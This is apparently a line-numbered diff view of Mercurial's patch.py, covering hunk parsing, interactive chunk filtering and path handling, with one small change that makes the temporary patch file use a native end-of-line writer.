966 966 """hunk -> (n+,n-)"""
967 967 add = len([h for h in hunk if h.startswith('+')])
968 968 rem = len([h for h in hunk if h.startswith('-')])
969 969 return add, rem
970 970
971 971 def reversehunk(self):
972 972 """return another recordhunk which is the reverse of the hunk
973 973
974 974 If this hunk is diff(A, B), the returned hunk is diff(B, A). To do
975 975 that, swap fromline/toline and +/- signs while keeping other things
976 976 unchanged.
977 977 """
978 978 m = {'+': '-', '-': '+', '\\': '\\'}
979 979 hunk = ['%s%s' % (m[l[0:1]], l[1:]) for l in self.hunk]
980 980 return recordhunk(self.header, self.toline, self.fromline, self.proc,
981 981 self.before, hunk, self.after)
982 982
983 983 def write(self, fp):
984 984 delta = len(self.before) + len(self.after)
985 985 if self.after and self.after[-1] == '\\ No newline at end of file\n':
986 986 delta -= 1
987 987 fromlen = delta + self.removed
988 988 tolen = delta + self.added
989 989 fp.write('@@ -%d,%d +%d,%d @@%s\n' %
990 990 (self.fromline, fromlen, self.toline, tolen,
991 991 self.proc and (' ' + self.proc)))
992 992 fp.write(''.join(self.before + self.hunk + self.after))
993 993
994 994 pretty = write
995 995
996 996 def filename(self):
997 997 return self.header.filename()
998 998
999 999 def __repr__(self):
1000 1000 return '<hunk %r@%d>' % (self.filename(), self.fromline)
1001 1001
1002 1002 def getmessages():
1003 1003 return {
1004 1004 'multiple': {
1005 1005 'apply': _("apply change %d/%d to '%s'?"),
1006 1006 'discard': _("discard change %d/%d to '%s'?"),
1007 1007 'record': _("record change %d/%d to '%s'?"),
1008 1008 },
1009 1009 'single': {
1010 1010 'apply': _("apply this change to '%s'?"),
1011 1011 'discard': _("discard this change to '%s'?"),
1012 1012 'record': _("record this change to '%s'?"),
1013 1013 },
1014 1014 'help': {
1015 1015 'apply': _('[Ynesfdaq?]'
1016 1016 '$$ &Yes, apply this change'
1017 1017 '$$ &No, skip this change'
1018 1018 '$$ &Edit this change manually'
1019 1019 '$$ &Skip remaining changes to this file'
1020 1020 '$$ Apply remaining changes to this &file'
1021 1021 '$$ &Done, skip remaining changes and files'
1022 1022 '$$ Apply &all changes to all remaining files'
1023 1023 '$$ &Quit, applying no changes'
1024 1024 '$$ &? (display help)'),
1025 1025 'discard': _('[Ynesfdaq?]'
1026 1026 '$$ &Yes, discard this change'
1027 1027 '$$ &No, skip this change'
1028 1028 '$$ &Edit this change manually'
1029 1029 '$$ &Skip remaining changes to this file'
1030 1030 '$$ Discard remaining changes to this &file'
1031 1031 '$$ &Done, skip remaining changes and files'
1032 1032 '$$ Discard &all changes to all remaining files'
1033 1033 '$$ &Quit, discarding no changes'
1034 1034 '$$ &? (display help)'),
1035 1035 'record': _('[Ynesfdaq?]'
1036 1036 '$$ &Yes, record this change'
1037 1037 '$$ &No, skip this change'
1038 1038 '$$ &Edit this change manually'
1039 1039 '$$ &Skip remaining changes to this file'
1040 1040 '$$ Record remaining changes to this &file'
1041 1041 '$$ &Done, skip remaining changes and files'
1042 1042 '$$ Record &all changes to all remaining files'
1043 1043 '$$ &Quit, recording no changes'
1044 1044 '$$ &? (display help)'),
1045 1045 }
1046 1046 }
1047 1047
1048 1048 def filterpatch(ui, headers, operation=None):
1049 1049 """Interactively filter patch chunks into applied-only chunks"""
1050 1050 messages = getmessages()
1051 1051
1052 1052 if operation is None:
1053 1053 operation = 'record'
1054 1054
1055 1055 def prompt(skipfile, skipall, query, chunk):
1056 1056 """prompt query, and process base inputs
1057 1057
1058 1058 - y/n for the rest of file
1059 1059 - y/n for the rest
1060 1060 - ? (help)
1061 1061 - q (quit)
1062 1062
1063 1063 Return True/False and possibly updated skipfile and skipall.
1064 1064 """
1065 1065 newpatches = None
1066 1066 if skipall is not None:
1067 1067 return skipall, skipfile, skipall, newpatches
1068 1068 if skipfile is not None:
1069 1069 return skipfile, skipfile, skipall, newpatches
1070 1070 while True:
1071 1071 resps = messages['help'][operation]
1072 1072 r = ui.promptchoice("%s %s" % (query, resps))
1073 1073 ui.write("\n")
1074 1074 if r == 8: # ?
1075 1075 for c, t in ui.extractchoices(resps)[1]:
1076 1076 ui.write('%s - %s\n' % (c, encoding.lower(t)))
1077 1077 continue
1078 1078 elif r == 0: # yes
1079 1079 ret = True
1080 1080 elif r == 1: # no
1081 1081 ret = False
1082 1082 elif r == 2: # Edit patch
1083 1083 if chunk is None:
1084 1084 ui.write(_('cannot edit patch for whole file'))
1085 1085 ui.write("\n")
1086 1086 continue
1087 1087 if chunk.header.binary():
1088 1088 ui.write(_('cannot edit patch for binary file'))
1089 1089 ui.write("\n")
1090 1090 continue
1091 1091 # Patch comment based on the Git one (based on comment at end of
1092 1092 # https://mercurial-scm.org/wiki/RecordExtension)
1093 1093 phelp = '---' + _("""
1094 1094 To remove '-' lines, make them ' ' lines (context).
1095 1095 To remove '+' lines, delete them.
1096 1096 Lines starting with # will be removed from the patch.
1097 1097
1098 1098 If the patch applies cleanly, the edited hunk will immediately be
1099 1099 added to the record list. If it does not apply cleanly, a rejects
1100 1100 file will be generated: you can use that when you try again. If
1101 1101 all lines of the hunk are removed, then the edit is aborted and
1102 1102 the hunk is left unchanged.
1103 1103 """)
1104 1104 (patchfd, patchfn) = tempfile.mkstemp(prefix="hg-editor-",
1105 suffix=".diff", text=True)
1105 suffix=".diff")
1106 1106 ncpatchfp = None
1107 1107 try:
1108 1108 # Write the initial patch
1109      - f = os.fdopen(patchfd, r"w")
     1109 + f = util.nativeeolwriter(os.fdopen(patchfd, r'wb'))
1110 1110 chunk.header.write(f)
1111 1111 chunk.write(f)
1112 1112 f.write('\n'.join(['# ' + i for i in phelp.splitlines()]))
1113 1113 f.close()
1114 1114 # Start the editor and wait for it to complete
1115 1115 editor = ui.geteditor()
1116 1116 ret = ui.system("%s \"%s\"" % (editor, patchfn),
1117 1117 environ={'HGUSER': ui.username()},
1118 1118 blockedtag='filterpatch')
1119 1119 if ret != 0:
1120 1120 ui.warn(_("editor exited with exit code %d\n") % ret)
1121 1121 continue
1122 1122 # Remove comment lines
1123 1123 patchfp = open(patchfn)
1124 1124 ncpatchfp = stringio()
1125 1125 for line in util.iterfile(patchfp):
1126 1126 if not line.startswith('#'):
1127 1127 ncpatchfp.write(line)
1128 1128 patchfp.close()
1129 1129 ncpatchfp.seek(0)
1130 1130 newpatches = parsepatch(ncpatchfp)
1131 1131 finally:
1132 1132 os.unlink(patchfn)
1133 1133 del ncpatchfp
1134 1134 # Signal that the chunk shouldn't be applied as-is, but
1135 1135 # provide the new patch to be used instead.
1136 1136 ret = False
1137 1137 elif r == 3: # Skip
1138 1138 ret = skipfile = False
1139 1139 elif r == 4: # file (Record remaining)
1140 1140 ret = skipfile = True
1141 1141 elif r == 5: # done, skip remaining
1142 1142 ret = skipall = False
1143 1143 elif r == 6: # all
1144 1144 ret = skipall = True
1145 1145 elif r == 7: # quit
1146 1146 raise error.Abort(_('user quit'))
1147 1147 return ret, skipfile, skipall, newpatches
1148 1148
1149 1149 seen = set()
1150 1150 applied = {} # 'filename' -> [] of chunks
1151 1151 skipfile, skipall = None, None
1152 1152 pos, total = 1, sum(len(h.hunks) for h in headers)
1153 1153 for h in headers:
1154 1154 pos += len(h.hunks)
1155 1155 skipfile = None
1156 1156 fixoffset = 0
1157 1157 hdr = ''.join(h.header)
1158 1158 if hdr in seen:
1159 1159 continue
1160 1160 seen.add(hdr)
1161 1161 if skipall is None:
1162 1162 h.pretty(ui)
1163 1163 msg = (_('examine changes to %s?') %
1164 1164 _(' and ').join("'%s'" % f for f in h.files()))
1165 1165 r, skipfile, skipall, np = prompt(skipfile, skipall, msg, None)
1166 1166 if not r:
1167 1167 continue
1168 1168 applied[h.filename()] = [h]
1169 1169 if h.allhunks():
1170 1170 applied[h.filename()] += h.hunks
1171 1171 continue
1172 1172 for i, chunk in enumerate(h.hunks):
1173 1173 if skipfile is None and skipall is None:
1174 1174 chunk.pretty(ui)
1175 1175 if total == 1:
1176 1176 msg = messages['single'][operation] % chunk.filename()
1177 1177 else:
1178 1178 idx = pos - len(h.hunks) + i
1179 1179 msg = messages['multiple'][operation] % (idx, total,
1180 1180 chunk.filename())
1181 1181 r, skipfile, skipall, newpatches = prompt(skipfile,
1182 1182 skipall, msg, chunk)
1183 1183 if r:
1184 1184 if fixoffset:
1185 1185 chunk = copy.copy(chunk)
1186 1186 chunk.toline += fixoffset
1187 1187 applied[chunk.filename()].append(chunk)
1188 1188 elif newpatches is not None:
1189 1189 for newpatch in newpatches:
1190 1190 for newhunk in newpatch.hunks:
1191 1191 if fixoffset:
1192 1192 newhunk.toline += fixoffset
1193 1193 applied[newhunk.filename()].append(newhunk)
1194 1194 else:
1195 1195 fixoffset += chunk.removed - chunk.added
1196 1196 return (sum([h for h in applied.itervalues()
1197 1197 if h[0].special() or len(h) > 1], []), {})
1198 1198 class hunk(object):
1199 1199 def __init__(self, desc, num, lr, context):
1200 1200 self.number = num
1201 1201 self.desc = desc
1202 1202 self.hunk = [desc]
1203 1203 self.a = []
1204 1204 self.b = []
1205 1205 self.starta = self.lena = None
1206 1206 self.startb = self.lenb = None
1207 1207 if lr is not None:
1208 1208 if context:
1209 1209 self.read_context_hunk(lr)
1210 1210 else:
1211 1211 self.read_unified_hunk(lr)
1212 1212
1213 1213 def getnormalized(self):
1214 1214 """Return a copy with line endings normalized to LF."""
1215 1215
1216 1216 def normalize(lines):
1217 1217 nlines = []
1218 1218 for line in lines:
1219 1219 if line.endswith('\r\n'):
1220 1220 line = line[:-2] + '\n'
1221 1221 nlines.append(line)
1222 1222 return nlines
1223 1223
1224 1224 # Dummy object, it is rebuilt manually
1225 1225 nh = hunk(self.desc, self.number, None, None)
1226 1226 nh.number = self.number
1227 1227 nh.desc = self.desc
1228 1228 nh.hunk = self.hunk
1229 1229 nh.a = normalize(self.a)
1230 1230 nh.b = normalize(self.b)
1231 1231 nh.starta = self.starta
1232 1232 nh.startb = self.startb
1233 1233 nh.lena = self.lena
1234 1234 nh.lenb = self.lenb
1235 1235 return nh
1236 1236
1237 1237 def read_unified_hunk(self, lr):
1238 1238 m = unidesc.match(self.desc)
1239 1239 if not m:
1240 1240 raise PatchError(_("bad hunk #%d") % self.number)
1241 1241 self.starta, self.lena, self.startb, self.lenb = m.groups()
1242 1242 if self.lena is None:
1243 1243 self.lena = 1
1244 1244 else:
1245 1245 self.lena = int(self.lena)
1246 1246 if self.lenb is None:
1247 1247 self.lenb = 1
1248 1248 else:
1249 1249 self.lenb = int(self.lenb)
1250 1250 self.starta = int(self.starta)
1251 1251 self.startb = int(self.startb)
1252 1252 diffhelpers.addlines(lr, self.hunk, self.lena, self.lenb, self.a,
1253 1253 self.b)
1254 1254 # if we hit eof before finishing out the hunk, the last line will
1255 1255 # be zero length. Let's try to fix it up.
1256 1256 while len(self.hunk[-1]) == 0:
1257 1257 del self.hunk[-1]
1258 1258 del self.a[-1]
1259 1259 del self.b[-1]
1260 1260 self.lena -= 1
1261 1261 self.lenb -= 1
1262 1262 self._fixnewline(lr)
1263 1263
1264 1264 def read_context_hunk(self, lr):
1265 1265 self.desc = lr.readline()
1266 1266 m = contextdesc.match(self.desc)
1267 1267 if not m:
1268 1268 raise PatchError(_("bad hunk #%d") % self.number)
1269 1269 self.starta, aend = m.groups()
1270 1270 self.starta = int(self.starta)
1271 1271 if aend is None:
1272 1272 aend = self.starta
1273 1273 self.lena = int(aend) - self.starta
1274 1274 if self.starta:
1275 1275 self.lena += 1
1276 1276 for x in xrange(self.lena):
1277 1277 l = lr.readline()
1278 1278 if l.startswith('---'):
1279 1279 # lines addition, old block is empty
1280 1280 lr.push(l)
1281 1281 break
1282 1282 s = l[2:]
1283 1283 if l.startswith('- ') or l.startswith('! '):
1284 1284 u = '-' + s
1285 1285 elif l.startswith(' '):
1286 1286 u = ' ' + s
1287 1287 else:
1288 1288 raise PatchError(_("bad hunk #%d old text line %d") %
1289 1289 (self.number, x))
1290 1290 self.a.append(u)
1291 1291 self.hunk.append(u)
1292 1292
1293 1293 l = lr.readline()
1294 1294 if l.startswith('\ '):
1295 1295 s = self.a[-1][:-1]
1296 1296 self.a[-1] = s
1297 1297 self.hunk[-1] = s
1298 1298 l = lr.readline()
1299 1299 m = contextdesc.match(l)
1300 1300 if not m:
1301 1301 raise PatchError(_("bad hunk #%d") % self.number)
1302 1302 self.startb, bend = m.groups()
1303 1303 self.startb = int(self.startb)
1304 1304 if bend is None:
1305 1305 bend = self.startb
1306 1306 self.lenb = int(bend) - self.startb
1307 1307 if self.startb:
1308 1308 self.lenb += 1
1309 1309 hunki = 1
1310 1310 for x in xrange(self.lenb):
1311 1311 l = lr.readline()
1312 1312 if l.startswith('\ '):
1313 1313 # XXX: the only way to hit this is with an invalid line range.
1314 1314 # The no-eol marker is not counted in the line range, but I
1315 1315 # guess there are diff(1) implementations out there which behave differently.
1316 1316 s = self.b[-1][:-1]
1317 1317 self.b[-1] = s
1318 1318 self.hunk[hunki - 1] = s
1319 1319 continue
1320 1320 if not l:
1321 1321 # line deletions, new block is empty and we hit EOF
1322 1322 lr.push(l)
1323 1323 break
1324 1324 s = l[2:]
1325 1325 if l.startswith('+ ') or l.startswith('! '):
1326 1326 u = '+' + s
1327 1327 elif l.startswith(' '):
1328 1328 u = ' ' + s
1329 1329 elif len(self.b) == 0:
1330 1330 # line deletions, new block is empty
1331 1331 lr.push(l)
1332 1332 break
1333 1333 else:
1334 1334 raise PatchError(_("bad hunk #%d old text line %d") %
1335 1335 (self.number, x))
1336 1336 self.b.append(s)
1337 1337 while True:
1338 1338 if hunki >= len(self.hunk):
1339 1339 h = ""
1340 1340 else:
1341 1341 h = self.hunk[hunki]
1342 1342 hunki += 1
1343 1343 if h == u:
1344 1344 break
1345 1345 elif h.startswith('-'):
1346 1346 continue
1347 1347 else:
1348 1348 self.hunk.insert(hunki - 1, u)
1349 1349 break
1350 1350
1351 1351 if not self.a:
1352 1352 # this happens when lines were only added to the hunk
1353 1353 for x in self.hunk:
1354 1354 if x.startswith('-') or x.startswith(' '):
1355 1355 self.a.append(x)
1356 1356 if not self.b:
1357 1357 # this happens when lines were only deleted from the hunk
1358 1358 for x in self.hunk:
1359 1359 if x.startswith('+') or x.startswith(' '):
1360 1360 self.b.append(x[1:])
1361 1361 # @@ -start,len +start,len @@
1362 1362 self.desc = "@@ -%d,%d +%d,%d @@\n" % (self.starta, self.lena,
1363 1363 self.startb, self.lenb)
1364 1364 self.hunk[0] = self.desc
1365 1365 self._fixnewline(lr)
1366 1366
1367 1367 def _fixnewline(self, lr):
1368 1368 l = lr.readline()
1369 1369 if l.startswith('\ '):
1370 1370 diffhelpers.fix_newline(self.hunk, self.a, self.b)
1371 1371 else:
1372 1372 lr.push(l)
1373 1373
1374 1374 def complete(self):
1375 1375 return len(self.a) == self.lena and len(self.b) == self.lenb
1376 1376
1377 1377 def _fuzzit(self, old, new, fuzz, toponly):
1378 1378 # this removes context lines from the top and bottom of the hunk. It
1379 1379 # checks the hunk to make sure only context lines are removed, and then
1380 1380 # returns a new shortened list of lines.
1381 1381 fuzz = min(fuzz, len(old))
1382 1382 if fuzz:
1383 1383 top = 0
1384 1384 bot = 0
1385 1385 hlen = len(self.hunk)
1386 1386 for x in xrange(hlen - 1):
1387 1387 # the hunk starts with the @@ line, so use x+1
1388 1388 if self.hunk[x + 1][0] == ' ':
1389 1389 top += 1
1390 1390 else:
1391 1391 break
1392 1392 if not toponly:
1393 1393 for x in xrange(hlen - 1):
1394 1394 if self.hunk[hlen - bot - 1][0] == ' ':
1395 1395 bot += 1
1396 1396 else:
1397 1397 break
1398 1398
1399 1399 bot = min(fuzz, bot)
1400 1400 top = min(fuzz, top)
1401 1401 return old[top:len(old) - bot], new[top:len(new) - bot], top
1402 1402 return old, new, 0
1403 1403
1404 1404 def fuzzit(self, fuzz, toponly):
1405 1405 old, new, top = self._fuzzit(self.a, self.b, fuzz, toponly)
1406 1406 oldstart = self.starta + top
1407 1407 newstart = self.startb + top
1408 1408 # zero length hunk ranges already have their start decremented
1409 1409 if self.lena and oldstart > 0:
1410 1410 oldstart -= 1
1411 1411 if self.lenb and newstart > 0:
1412 1412 newstart -= 1
1413 1413 return old, oldstart, new, newstart
1414 1414
1415 1415 class binhunk(object):
1416 1416 'A binary patch file.'
1417 1417 def __init__(self, lr, fname):
1418 1418 self.text = None
1419 1419 self.delta = False
1420 1420 self.hunk = ['GIT binary patch\n']
1421 1421 self._fname = fname
1422 1422 self._read(lr)
1423 1423
1424 1424 def complete(self):
1425 1425 return self.text is not None
1426 1426
1427 1427 def new(self, lines):
1428 1428 if self.delta:
1429 1429 return [applybindelta(self.text, ''.join(lines))]
1430 1430 return [self.text]
1431 1431
1432 1432 def _read(self, lr):
1433 1433 def getline(lr, hunk):
1434 1434 l = lr.readline()
1435 1435 hunk.append(l)
1436 1436 return l.rstrip('\r\n')
1437 1437
1438 1438 size = 0
1439 1439 while True:
1440 1440 line = getline(lr, self.hunk)
1441 1441 if not line:
1442 1442 raise PatchError(_('could not extract "%s" binary data')
1443 1443 % self._fname)
1444 1444 if line.startswith('literal '):
1445 1445 size = int(line[8:].rstrip())
1446 1446 break
1447 1447 if line.startswith('delta '):
1448 1448 size = int(line[6:].rstrip())
1449 1449 self.delta = True
1450 1450 break
1451 1451 dec = []
1452 1452 line = getline(lr, self.hunk)
1453 1453 while len(line) > 1:
1454 1454 l = line[0:1]
1455 1455 if l <= 'Z' and l >= 'A':
1456 1456 l = ord(l) - ord('A') + 1
1457 1457 else:
1458 1458 l = ord(l) - ord('a') + 27
1459 1459 try:
1460 1460 dec.append(util.b85decode(line[1:])[:l])
1461 1461 except ValueError as e:
1462 1462 raise PatchError(_('could not decode "%s" binary patch: %s')
1463 1463 % (self._fname, util.forcebytestr(e)))
1464 1464 line = getline(lr, self.hunk)
1465 1465 text = zlib.decompress(''.join(dec))
1466 1466 if len(text) != size:
1467 1467 raise PatchError(_('"%s" length is %d bytes, should be %d')
1468 1468 % (self._fname, len(text), size))
1469 1469 self.text = text
1470 1470
1471 1471 def parsefilename(str):
1472 1472 # --- filename \t|space stuff
1473 1473 s = str[4:].rstrip('\r\n')
1474 1474 i = s.find('\t')
1475 1475 if i < 0:
1476 1476 i = s.find(' ')
1477 1477 if i < 0:
1478 1478 return s
1479 1479 return s[:i]
1480 1480
1481 1481 def reversehunks(hunks):
1482 1482 '''reverse the signs in the hunks given as argument
1483 1483
1484 1484 This function operates on hunks coming out of patch.filterpatch, that is
1485 1485 a list of the form: [header1, hunk1, hunk2, header2...]. Example usage:
1486 1486
1487 1487 >>> rawpatch = b"""diff --git a/folder1/g b/folder1/g
1488 1488 ... --- a/folder1/g
1489 1489 ... +++ b/folder1/g
1490 1490 ... @@ -1,7 +1,7 @@
1491 1491 ... +firstline
1492 1492 ... c
1493 1493 ... 1
1494 1494 ... 2
1495 1495 ... + 3
1496 1496 ... -4
1497 1497 ... 5
1498 1498 ... d
1499 1499 ... +lastline"""
1500 1500 >>> hunks = parsepatch([rawpatch])
1501 1501 >>> hunkscomingfromfilterpatch = []
1502 1502 >>> for h in hunks:
1503 1503 ... hunkscomingfromfilterpatch.append(h)
1504 1504 ... hunkscomingfromfilterpatch.extend(h.hunks)
1505 1505
1506 1506 >>> reversedhunks = reversehunks(hunkscomingfromfilterpatch)
1507 1507 >>> from . import util
1508 1508 >>> fp = util.stringio()
1509 1509 >>> for c in reversedhunks:
1510 1510 ... c.write(fp)
1511 1511 >>> fp.seek(0) or None
1512 1512 >>> reversedpatch = fp.read()
1513 1513 >>> print(pycompat.sysstr(reversedpatch))
1514 1514 diff --git a/folder1/g b/folder1/g
1515 1515 --- a/folder1/g
1516 1516 +++ b/folder1/g
1517 1517 @@ -1,4 +1,3 @@
1518 1518 -firstline
1519 1519 c
1520 1520 1
1521 1521 2
1522 1522 @@ -2,6 +1,6 @@
1523 1523 c
1524 1524 1
1525 1525 2
1526 1526 - 3
1527 1527 +4
1528 1528 5
1529 1529 d
1530 1530 @@ -6,3 +5,2 @@
1531 1531 5
1532 1532 d
1533 1533 -lastline
1534 1534
1535 1535 '''
1536 1536
1537 1537 newhunks = []
1538 1538 for c in hunks:
1539 1539 if util.safehasattr(c, 'reversehunk'):
1540 1540 c = c.reversehunk()
1541 1541 newhunks.append(c)
1542 1542 return newhunks
1543 1543
1544 1544 def parsepatch(originalchunks, maxcontext=None):
1545 1545 """patch -> [] of headers -> [] of hunks
1546 1546
1547 1547 If maxcontext is not None, trim context lines if necessary.
1548 1548
1549 1549 >>> rawpatch = b'''diff --git a/folder1/g b/folder1/g
1550 1550 ... --- a/folder1/g
1551 1551 ... +++ b/folder1/g
1552 1552 ... @@ -1,8 +1,10 @@
1553 1553 ... 1
1554 1554 ... 2
1555 1555 ... -3
1556 1556 ... 4
1557 1557 ... 5
1558 1558 ... 6
1559 1559 ... +6.1
1560 1560 ... +6.2
1561 1561 ... 7
1562 1562 ... 8
1563 1563 ... +9'''
1564 1564 >>> out = util.stringio()
1565 1565 >>> headers = parsepatch([rawpatch], maxcontext=1)
1566 1566 >>> for header in headers:
1567 1567 ... header.write(out)
1568 1568 ... for hunk in header.hunks:
1569 1569 ... hunk.write(out)
1570 1570 >>> print(pycompat.sysstr(out.getvalue()))
1571 1571 diff --git a/folder1/g b/folder1/g
1572 1572 --- a/folder1/g
1573 1573 +++ b/folder1/g
1574 1574 @@ -2,3 +2,2 @@
1575 1575 2
1576 1576 -3
1577 1577 4
1578 1578 @@ -6,2 +5,4 @@
1579 1579 6
1580 1580 +6.1
1581 1581 +6.2
1582 1582 7
1583 1583 @@ -8,1 +9,2 @@
1584 1584 8
1585 1585 +9
1586 1586 """
1587 1587 class parser(object):
1588 1588 """patch parsing state machine"""
1589 1589 def __init__(self):
1590 1590 self.fromline = 0
1591 1591 self.toline = 0
1592 1592 self.proc = ''
1593 1593 self.header = None
1594 1594 self.context = []
1595 1595 self.before = []
1596 1596 self.hunk = []
1597 1597 self.headers = []
1598 1598
1599 1599 def addrange(self, limits):
1600 1600 fromstart, fromend, tostart, toend, proc = limits
1601 1601 self.fromline = int(fromstart)
1602 1602 self.toline = int(tostart)
1603 1603 self.proc = proc
1604 1604
1605 1605 def addcontext(self, context):
1606 1606 if self.hunk:
1607 1607 h = recordhunk(self.header, self.fromline, self.toline,
1608 1608 self.proc, self.before, self.hunk, context, maxcontext)
1609 1609 self.header.hunks.append(h)
1610 1610 self.fromline += len(self.before) + h.removed
1611 1611 self.toline += len(self.before) + h.added
1612 1612 self.before = []
1613 1613 self.hunk = []
1614 1614 self.context = context
1615 1615
1616 1616 def addhunk(self, hunk):
1617 1617 if self.context:
1618 1618 self.before = self.context
1619 1619 self.context = []
1620 1620 self.hunk = hunk
1621 1621
1622 1622 def newfile(self, hdr):
1623 1623 self.addcontext([])
1624 1624 h = header(hdr)
1625 1625 self.headers.append(h)
1626 1626 self.header = h
1627 1627
1628 1628 def addother(self, line):
1629 1629 pass # 'other' lines are ignored
1630 1630
1631 1631 def finished(self):
1632 1632 self.addcontext([])
1633 1633 return self.headers
1634 1634
1635 1635 transitions = {
1636 1636 'file': {'context': addcontext,
1637 1637 'file': newfile,
1638 1638 'hunk': addhunk,
1639 1639 'range': addrange},
1640 1640 'context': {'file': newfile,
1641 1641 'hunk': addhunk,
1642 1642 'range': addrange,
1643 1643 'other': addother},
1644 1644 'hunk': {'context': addcontext,
1645 1645 'file': newfile,
1646 1646 'range': addrange},
1647 1647 'range': {'context': addcontext,
1648 1648 'hunk': addhunk},
1649 1649 'other': {'other': addother},
1650 1650 }
1651 1651
1652 1652 p = parser()
1653 1653 fp = stringio()
1654 1654 fp.write(''.join(originalchunks))
1655 1655 fp.seek(0)
1656 1656
1657 1657 state = 'context'
1658 1658 for newstate, data in scanpatch(fp):
1659 1659 try:
1660 1660 p.transitions[state][newstate](p, data)
1661 1661 except KeyError:
1662 1662 raise PatchError('unhandled transition: %s -> %s' %
1663 1663 (state, newstate))
1664 1664 state = newstate
1665 1665 del fp
1666 1666 return p.finished()
1667 1667
1668 1668 def pathtransform(path, strip, prefix):
1669 1669 '''turn a path from a patch into a path suitable for the repository
1670 1670
1671 1671 prefix, if not empty, is expected to be normalized with a / at the end.
1672 1672
1673 1673 Returns (stripped components, path in repository).
1674 1674
1675 1675 >>> pathtransform(b'a/b/c', 0, b'')
1676 1676 ('', 'a/b/c')
1677 1677 >>> pathtransform(b' a/b/c ', 0, b'')
1678 1678 ('', ' a/b/c')
1679 1679 >>> pathtransform(b' a/b/c ', 2, b'')
1680 1680 ('a/b/', 'c')
1681 1681 >>> pathtransform(b'a/b/c', 0, b'd/e/')
1682 1682 ('', 'd/e/a/b/c')
1683 1683 >>> pathtransform(b' a//b/c ', 2, b'd/e/')
1684 1684 ('a//b/', 'd/e/c')
1685 1685 >>> pathtransform(b'a/b/c', 3, b'')
1686 1686 Traceback (most recent call last):
1687 1687 PatchError: unable to strip away 1 of 3 dirs from a/b/c
1688 1688 '''
1689 1689 pathlen = len(path)
1690 1690 i = 0
1691 1691 if strip == 0:
1692 1692 return '', prefix + path.rstrip()
1693 1693 count = strip
1694 1694 while count > 0:
1695 1695 i = path.find('/', i)
1696 1696 if i == -1:
1697 1697 raise PatchError(_("unable to strip away %d of %d dirs from %s") %
1698 1698 (count, strip, path))
1699 1699 i += 1
1700 1700 # consume '//' in the path
1701 1701 while i < pathlen - 1 and path[i:i + 1] == '/':
1702 1702 i += 1
1703 1703 count -= 1
1704 1704 return path[:i].lstrip(), prefix + path[i:].rstrip()
1705 1705
1706 1706 def makepatchmeta(backend, afile_orig, bfile_orig, hunk, strip, prefix):
1707 1707 nulla = afile_orig == "/dev/null"
1708 1708 nullb = bfile_orig == "/dev/null"
1709 1709 create = nulla and hunk.starta == 0 and hunk.lena == 0
1710 1710 remove = nullb and hunk.startb == 0 and hunk.lenb == 0
1711 1711 abase, afile = pathtransform(afile_orig, strip, prefix)
1712 1712 gooda = not nulla and backend.exists(afile)
1713 1713 bbase, bfile = pathtransform(bfile_orig, strip, prefix)
1714 1714 if afile == bfile:
1715 1715 goodb = gooda
1716 1716 else:
1717 1717 goodb = not nullb and backend.exists(bfile)
1718 1718 missing = not goodb and not gooda and not create
1719 1719
1720 1720 # some diff programs apparently produce patches where the afile is
1721 1721 # not /dev/null, but afile starts with bfile
1722 1722 abasedir = afile[:afile.rfind('/') + 1]
1723 1723 bbasedir = bfile[:bfile.rfind('/') + 1]
1724 1724 if (missing and abasedir == bbasedir and afile.startswith(bfile)
1725 1725 and hunk.starta == 0 and hunk.lena == 0):
1726 1726 create = True
1727 1727 missing = False
1728 1728
1729 1729 # If afile is "a/b/foo" and bfile is "a/b/foo.orig" we assume the
1730 1730 # diff is between a file and its backup. In this case, the original
1731 1731 # file should be patched (see original mpatch code).
1732 1732 isbackup = (abase == bbase and bfile.startswith(afile))
1733 1733 fname = None
1734 1734 if not missing:
1735 1735 if gooda and goodb:
1736 1736 if isbackup:
1737 1737 fname = afile
1738 1738 else:
1739 1739 fname = bfile
1740 1740 elif gooda:
1741 1741 fname = afile
1742 1742
1743 1743 if not fname:
1744 1744 if not nullb:
1745 1745 if isbackup:
1746 1746 fname = afile
1747 1747 else:
1748 1748 fname = bfile
1749 1749 elif not nulla:
1750 1750 fname = afile
1751 1751 else:
1752 1752 raise PatchError(_("undefined source and destination files"))
1753 1753
1754 1754 gp = patchmeta(fname)
1755 1755 if create:
1756 1756 gp.op = 'ADD'
1757 1757 elif remove:
1758 1758 gp.op = 'DELETE'
1759 1759 return gp
1760 1760
1761 1761 def scanpatch(fp):
1762 1762 """like patch.iterhunks, but yield different events
1763 1763
1764 1764 - ('file', [header_lines + fromfile + tofile])
1765 1765 - ('context', [context_lines])
1766 1766 - ('hunk', [hunk_lines])
1767 1767 - ('range', (-start,len, +start,len, proc))
1768 1768 """
1769 1769 lines_re = re.compile(br'@@ -(\d+),(\d+) \+(\d+),(\d+) @@\s*(.*)')
1770 1770 lr = linereader(fp)
1771 1771
1772 1772 def scanwhile(first, p):
1773 1773 """scan lr while predicate holds"""
1774 1774 lines = [first]
1775 1775 for line in iter(lr.readline, ''):
1776 1776 if p(line):
1777 1777 lines.append(line)
1778 1778 else:
1779 1779 lr.push(line)
1780 1780 break
1781 1781 return lines
1782 1782
1783 1783 for line in iter(lr.readline, ''):
1784 1784 if line.startswith('diff --git a/') or line.startswith('diff -r '):
1785 1785 def notheader(line):
1786 1786 s = line.split(None, 1)
1787 1787 return not s or s[0] not in ('---', 'diff')
1788 1788 header = scanwhile(line, notheader)
1789 1789 fromfile = lr.readline()
1790 1790 if fromfile.startswith('---'):
1791 1791 tofile = lr.readline()
1792 1792 header += [fromfile, tofile]
1793 1793 else:
1794 1794 lr.push(fromfile)
1795 1795 yield 'file', header
1796 1796 elif line[0:1] == ' ':
1797 1797 yield 'context', scanwhile(line, lambda l: l[0] in ' \\')
1798 1798 elif line[0] in '-+':
1799 1799 yield 'hunk', scanwhile(line, lambda l: l[0] in '-+\\')
1800 1800 else:
1801 1801 m = lines_re.match(line)
1802 1802 if m:
1803 1803 yield 'range', m.groups()
1804 1804 else:
1805 1805 yield 'other', line
1806 1806
1807 1807 def scangitpatch(lr, firstline):
1808 1808 """
1809 1809 Git patches can emit:
1810 1810 - rename a to b
1811 1811 - change b
1812 1812 - copy a to c
1813 1813 - change c
1814 1814
1815 1815 We cannot apply this sequence as-is: the renamed 'a' could not be
1816 1816 found, for it would have been renamed already. And we cannot copy
1817 1817 from 'b' instead because 'b' would have been changed already. So
1818 1818 we scan the git patch for copy and rename commands so we can
1819 1819 perform the copies ahead of time.
1820 1820 """
1821 1821 pos = 0
1822 1822 try:
1823 1823 pos = lr.fp.tell()
1824 1824 fp = lr.fp
1825 1825 except IOError:
1826 1826 fp = stringio(lr.fp.read())
